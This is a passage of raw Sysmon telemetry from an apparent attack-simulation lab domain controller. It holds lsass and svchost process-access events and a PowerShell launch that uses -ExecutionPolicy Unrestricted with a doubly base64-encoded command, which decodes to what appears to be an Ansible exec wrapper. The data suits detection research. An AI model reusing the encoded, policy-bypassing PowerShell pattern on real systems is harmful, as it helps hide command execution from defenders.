13:52:24.337{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.274{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.274{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.274{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.274{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.274{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.259{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.997{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.931{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.931{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.899{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hvqp1xti.wpo.ps12020-12-08 13:52:25.899 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 